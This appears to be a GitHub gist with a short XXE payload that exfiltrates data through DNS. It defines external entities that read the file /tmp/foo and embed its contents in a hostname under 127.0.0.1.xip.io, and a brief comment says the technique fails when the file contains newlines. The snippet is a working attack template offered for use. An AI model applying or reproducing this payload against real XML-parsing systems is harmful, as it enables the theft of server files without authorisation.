Example of data exfil using DNS in XXE. This will only work if the target file (/tmp/foo in this case) does not contain new lines. Good luck with that!
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!ENTITY % data SYSTEM "file:///tmp/foo"> | |
| <!ENTITY % url "<!ENTITY % exfil SYSTEM 'http://%data;.127.0.0.1.xip.io/capture'>"> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment